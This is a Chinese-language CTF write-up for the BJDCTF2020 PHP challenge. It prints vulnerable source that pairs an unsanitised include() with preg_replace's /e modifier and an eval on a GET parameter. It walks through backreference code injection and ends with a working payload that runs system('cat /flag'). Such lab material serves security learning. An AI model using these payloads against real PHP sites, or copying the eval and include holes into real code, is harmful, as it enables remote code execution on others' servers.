[BJDCTF2020]ZJCTF，不过如此

 

知识点

• php://input
• filter伪协议
• preg_replace() /e模式命令执行
  题目源码

php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "
".file_get_contents($text,'r')."
";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

 

读取一下next.php

#next.php
php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

 

preg_replace

preg_replace(pattern, replacement, subject)

 

当pattern传入的正则表达式带有/e时，存在命令执行，即当匹配到符合正则表达式的字符串时，第二个参数的字符串可被当做代码来执行。
这里第二个参数固定为strtolower("\\1")
这里的\\1实际上体现为\1
w3cschool

反向引用
对一个正则表达式模式或部分模式两边添加圆括号将导致相关匹配存储到一个临时缓冲区中，所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始，最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问

这里的\1指的是第一个匹配项
官方payload/?.*={${phpinfo()}}
即

php
preg_replace('/(.*)/ei','strtolower("\\1")','{${phpinfo()}}');

 

 

但这里存在的问题是，GET方式传的字符串，.会被替换成_，这里采用

\S*=${phpinfo()}  #\S 在php正则表达式中表示匹配所有非空字符，*表示多次匹配

 

最终payload

/next.php?\S*=${getFlag()}&cmd=system('cat /flag');

 

参考
深入研究preg_replace与代码执行